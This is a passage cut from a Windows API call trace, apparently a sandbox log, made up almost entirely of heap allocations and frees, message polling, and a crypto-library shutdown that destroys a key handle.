0x2e50f08 [0230.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0230.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0230.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0230.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0230.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f440 [0230.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0230.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0230.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0230.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0230.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0230.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0230.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0230.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0230.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0230.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04348 [0230.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0230.573] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0230.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04348 | out: hHeap=0x970000) returned 1 [0230.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0230.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511d8 [0230.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0230.574] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0230.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0230.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0230.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0230.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0230.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0230.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0230.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0230.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0230.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0230.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0230.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0230.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0230.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0230.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0230.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0230.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0230.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0230.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0230.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0230.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4e0 [0230.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0230.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0230.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0230.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0230.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0230.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0230.575] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0230.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0230.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0230.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0230.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0230.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0230.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0230.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0230.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0230.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0230.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0230.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0230.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0230.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0230.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0230.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0230.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0230.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0230.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0230.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0230.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0230.575] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0230.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0230.576] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e511c0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0230.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0230.576] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0230.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0230.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0230.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0230.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0230.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0230.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0230.576] CryptDestroyKey (hKey=0xa87290) returned 1 [0230.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0230.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0230.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0230.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0230.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0230.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0230.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0230.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0230.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0230.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0230.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0230.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0230.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0230.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0230.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0230.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0230.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0230.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0230.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0230.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0230.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0230.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0230.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0230.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0230.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0230.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0230.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0230.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0230.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0230.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f4e0 | out: hHeap=0x970000) returned 1 [0230.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0230.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0230.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0230.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0230.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0230.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0230.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0230.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0230.578] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0230.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0230.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0230.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0230.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0230.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0230.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4e0 [0230.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0230.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0230.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0230.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0230.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0230.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0230.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0230.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0230.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0230.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0230.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0230.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0230.578] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0230.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6c0 [0230.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0230.578] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0230.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6c0 | out: hHeap=0x970000) returned 1 [0230.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0230.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f08 [0230.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0230.579] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0230.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04460 [0230.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0230.579] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0230.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04460 | out: hHeap=0x970000) returned 1 [0230.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0230.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f68 [0230.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0230.579] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0230.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0230.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0230.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0230.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0230.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0230.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0230.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0230.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0230.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0230.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51178 [0230.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0230.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51070 [0230.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510a0 [0230.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50fe0 [0230.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f698 [0230.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0230.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50cf8 [0230.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51280 [0230.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ff8 [0230.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0230.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0230.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0230.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0230.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0230.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0230.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0230.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0230.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0230.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0230.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0230.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0230.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f698 | out: hHeap=0x970000) returned 1 [0230.580] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0230.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0230.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0230.580] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0230.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0230.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04690 [0230.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0230.580] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0230.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04690 | out: hHeap=0x970000) returned 1 [0230.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0230.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f68 [0230.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0230.581] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0230.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0230.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0230.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0230.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0230.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0230.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0230.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0230.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0230.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0230.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0230.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0230.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0230.581] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0230.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0230.581] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0230.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0230.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0230.581] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0230.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0230.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0230.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0230.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0230.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0230.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0230.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0230.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0230.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0230.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0230.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0230.582] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0230.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0230.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0230.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0230.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0230.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0230.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0230.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0230.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0230.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0230.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 